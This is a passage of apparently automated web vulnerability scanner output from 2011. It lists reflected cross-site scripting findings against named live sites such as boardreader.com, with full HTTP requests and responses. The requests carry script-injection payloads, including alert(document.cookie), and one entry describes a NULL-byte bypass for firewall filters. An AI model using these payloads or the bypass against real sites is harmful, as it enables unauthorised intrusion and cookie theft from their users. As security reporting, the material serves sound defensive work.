The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /index.php?a=l&q=s0.2mdn.net%2Fviewad%2F817-grey.gif&ebef7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6f696982a6d=1&q2=s0.2mdn.net%2Fviewad%2F817-grey.gif%002cc1b"><script>alert(1)</script>44dd33ad4cf&extended_search=1<ype=ext HTTP/1.1 Host: boardreader.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 07:28:24 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>s0.2md ...[SNIP]... <A onclick="" href="./index.php?o=10&a=l&q=s0.2mdn.net%2Fviewad%2F817-grey.gif&ebef7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6f696982a6d=1&q2=s0.2mdn.net%2Fviewad%2F817-grey.gif%002cc1b"><script>alert(1)</script>44dd33ad4cf&extended_search=1<ype=ext"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d233"><script>alert(1)</script>fb62f634db2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /linkinfo/2mdn.net9d233"><script>alert(1)</script>fb62f634db2 HTTP/1.1 Host: boardreader.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 07:30:55 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>2mdn.n ...[SNIP]... <link rel="alternate" type="application/rss+xml" title="RSS 2.0" href="http://boardreader.com//linkrss/2mdn.net9d233"><script>alert(1)</script>fb62f634db2?p=10&format=RSS2.0" /> ...[SNIP]...
1.110. http://boardreader.com/my/signup.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://boardreader.com
Path:
/my/signup.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ee33"><script>alert(1)</script>4385cd9a478 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /my/signup.html?4ee33"><script>alert(1)</script>4385cd9a478=1 HTTP/1.1 Host: boardreader.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 07:04:39 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <link rel="shortcut ...[SNIP]... <form name="mylogin_" action="/my/signup.html?4ee33"><script>alert(1)</script>4385cd9a478=1" method="POST"> ...[SNIP]...
1.111. http://boardreader.com/s/2mdn.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://boardreader.com
Path:
/s/2mdn.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0fe6"><script>alert(1)</script>3c9811f6ee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /s/2mdn.html?d0fe6"><script>alert(1)</script>3c9811f6ee=1 HTTP/1.1 Host: boardreader.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 07:27:53 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta ...[SNIP]... <link rel="alternate" type="application/rss+xml" title="RSS 2.0" href="http://boardreader.com/rss/2mdn.html?d0fe6"><script>alert(1)</script>3c9811f6ee=1&p=20&format=RSS2.0" /> ...[SNIP]...
1.112. http://boardreader.com/site/Monterey_military_Group_CafeMo_764716.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://boardreader.com
Path:
/site/Monterey_military_Group_CafeMo_764716.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 992f8"><script>alert(1)</script>4308af3ecf7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/Monterey_military_Group_CafeMo_764716.html?992f8"><script>alert(1)</script>4308af3ecf7=1 HTTP/1.1 Host: boardreader.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 07:12:43 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <link rel="shortcut ...[SNIP]... <a href="http://boardreader.com/site/Monterey_military_Group_CafeMo_764716.html?992f8"><script>alert(1)</script>4308af3ecf7=1" title="Monterey military Group - CafeMom | Site Profile"> ...[SNIP]...
1.113. http://boardreader.com/site/Nolan_Fans_Forums_8842059.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://boardreader.com
Path:
/site/Nolan_Fans_Forums_8842059.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42801"><script>alert(1)</script>8c06b2169ee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/Nolan_Fans_Forums_8842059.html?42801"><script>alert(1)</script>8c06b2169ee=1 HTTP/1.1 Host: boardreader.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 07:13:17 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <link rel="shortcut ...[SNIP]... <a href="http://boardreader.com/site/Nolan_Fans_Forums_8842059.html?42801"><script>alert(1)</script>8c06b2169ee=1" title="Nolan Fans | Forums | Site Profile"> ...[SNIP]...
1.114. http://boardreader.com/site/RateDesi_Forums_13026.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://boardreader.com
Path:
/site/RateDesi_Forums_13026.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59e88"><script>alert(1)</script>ff22a856e5b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/RateDesi_Forums_13026.html?59e88"><script>alert(1)</script>ff22a856e5b=1 HTTP/1.1 Host: boardreader.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 07:16:39 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <link rel="shortcut ...[SNIP]... <a href="http://boardreader.com/site/RateDesi_Forums_13026.html?59e88"><script>alert(1)</script>ff22a856e5b=1" title="RateDesi Forums | Site Profile"> ...[SNIP]...
1.115. http://boardreader.com/site/Research_Learn_Message_Boards_1404604.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://boardreader.com
Path:
/site/Research_Learn_Message_Boards_1404604.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7999"><script>alert(1)</script>ffa4f5f1626 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/Research_Learn_Message_Boards_1404604.html?b7999"><script>alert(1)</script>ffa4f5f1626=1 HTTP/1.1 Host: boardreader.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 07:13:54 GMT Server: Apache Expires: Thu, 03 Feb 2011 13:13:55 +0000 Cache-Control: no-store, max-age=21600 Pragma: Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <link rel="shortcut ...[SNIP]... <a href="http://boardreader.com/site/Research_Learn_Message_Boards_1404604.html?b7999"><script>alert(1)</script>ffa4f5f1626=1" title="Research & Learn Message Boards - AOL Message Boards | Site Profile"> ...[SNIP]...
1.116. http://boardreader.com/site/Sherdog_Mixed_Martial_Arts_For_14952.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://boardreader.com
Path:
/site/Sherdog_Mixed_Martial_Arts_For_14952.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ced5c"><script>alert(1)</script>6a0288545dc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/Sherdog_Mixed_Martial_Arts_For_14952.html?ced5c"><script>alert(1)</script>6a0288545dc=1 HTTP/1.1 Host: boardreader.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 07:20:51 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <link rel="shortcut ...[SNIP]... <a href="http://boardreader.com/site/Sherdog_Mixed_Martial_Arts_For_14952.html?ced5c"><script>alert(1)</script>6a0288545dc=1" title="Sherdog Mixed Martial Arts Forums | Site Profile"> ...[SNIP]...
1.117. http://boardreader.com/site/The_CafeMom_Newcomers_Club_Gro_655408.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://boardreader.com
Path:
/site/The_CafeMom_Newcomers_Club_Gro_655408.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e6f5"><script>alert(1)</script>40022661852 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/The_CafeMom_Newcomers_Club_Gro_655408.html?1e6f5"><script>alert(1)</script>40022661852=1 HTTP/1.1 Host: boardreader.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 07:12:08 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <link rel="shortcut ...[SNIP]... <a href="http://boardreader.com/site/The_CafeMom_Newcomers_Club_Gro_655408.html?1e6f5"><script>alert(1)</script>40022661852=1" title="The CafeMom Newcomers Club Group - CafeMom | Site Profile"> ...[SNIP]...
1.118. http://boardreader.com/site/The_Mastiff_Sweet_Spot_6024491.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://boardreader.com
Path:
/site/The_Mastiff_Sweet_Spot_6024491.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1e18"><script>alert(1)</script>6e380957a50 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/The_Mastiff_Sweet_Spot_6024491.html?c1e18"><script>alert(1)</script>6e380957a50=1 HTTP/1.1 Host: boardreader.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 07:13:27 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <link rel="shortcut ...[SNIP]... <a href="http://boardreader.com/site/The_Mastiff_Sweet_Spot_6024491.html?c1e18"><script>alert(1)</script>6e380957a50=1" title="The Mastiff Sweet Spot | Site Profile"> ...[SNIP]...
1.119. http://boardreader.com/site/UFC_Community_Forum_9057873.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://boardreader.com
Path:
/site/UFC_Community_Forum_9057873.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7eb29"><script>alert(1)</script>110fab5c39e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/UFC_Community_Forum_9057873.html?7eb29"><script>alert(1)</script>110fab5c39e=1 HTTP/1.1 Host: boardreader.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 07:16:13 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <link rel="shortcut ...[SNIP]... <a href="http://boardreader.com/site/UFC_Community_Forum_9057873.html?7eb29"><script>alert(1)</script>110fab5c39e=1" title="UFC Community Forum | Site Profile"> ...[SNIP]...
1.120. http://boardreader.com/site/Ultimate_College_Softball_5898982.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://boardreader.com
Path:
/site/Ultimate_College_Softball_5898982.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b11b"><script>alert(1)</script>5da4301906 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/Ultimate_College_Softball_5898982.html?5b11b"><script>alert(1)</script>5da4301906=1 HTTP/1.1 Host: boardreader.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 07:10:49 GMT Server: Apache Expires: Thu, 03 Feb 2011 13:10:50 +0000 Cache-Control: no-store, max-age=21600 Pragma: Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <link rel="shortcut ...[SNIP]... <a href="http://boardreader.com/site/Ultimate_College_Softball_5898982.html?5b11b"><script>alert(1)</script>5da4301906=1" title="Ultimate College Softball | Site Profile"> ...[SNIP]...
1.121. http://boardreader.com/site/mntdiat_mai_aigi_7486781.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://boardreader.com
Path:
/site/mntdiat_mai_aigi_7486781.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e1ca"><script>alert(1)</script>c60cedb11b4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/mntdiat_mai_aigi_7486781.html?3e1ca"><script>alert(1)</script>c60cedb11b4=1 HTTP/1.1 Host: boardreader.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 07:13:01 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <link rel="shortcut ...[SNIP]... <a href="http://boardreader.com/site/mntdiat_mai_aigi_7486781.html?3e1ca"><script>alert(1)</script>c60cedb11b4=1" title=".............. ...... ........ | Site Profile"> ...[SNIP]...
1.122. http://consumershealthyliving.com/clinical-study.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://consumershealthyliving.com
Path:
/clinical-study.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15882"><a>3a9ae0f5291 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /clinical-study.html?15882"><a>3a9ae0f5291=1 HTTP/1.1 Host: consumershealthyliving.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Tue, 01 Feb 2011 15:31:26 GMT Server: Apache X-Powered-By: PHP/5.2.16 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: af0de5e19d0aeec9236a3a01ce912df8=n0799snp41r1h1s86rdk7kmg30; path=/ Last-Modified: Tue, 01 Feb 2011 15:31:26 GMT Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 25570
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > ...[SNIP]... <a href="http://consumershealthyliving.com/clinical-study.html?15882"><a>3a9ae0f5291=1&fontstyle=f-larger" title="Increase Font Size" class="large"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload %0082f2d<a>e2e94140c60 was submitted in the REST URL parameter 1. This input was echoed as 82f2d<a>e2e94140c60 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /weblog%0082f2d<a>e2e94140c60/2006/06/again/ HTTP/1.1 Host: dean.edwards.name Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Tue, 01 Feb 2011 15:33:00 GMT Server: Apache/2.2.6 (Win32) PHP/5.2.5 X-Powered-By: PHP/5.2.5 Vary: Accept-Encoding Content-Length: 1644 Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00b5fd5"><script>alert(1)</script>73be2182441 was submitted in the REST URL parameter 1. This input was echoed as b5fd5"><script>alert(1)</script>73be2182441 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /weblog%00b5fd5"><script>alert(1)</script>73be2182441/2006/06/again/ HTTP/1.1 Host: dean.edwards.name Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Tue, 01 Feb 2011 15:32:59 GMT Server: Apache/2.2.6 (Win32) PHP/5.2.5 X-Powered-By: PHP/5.2.5 Vary: Accept-Encoding Content-Length: 1790 Connection: close Content-Type: text/html; charset=utf-8
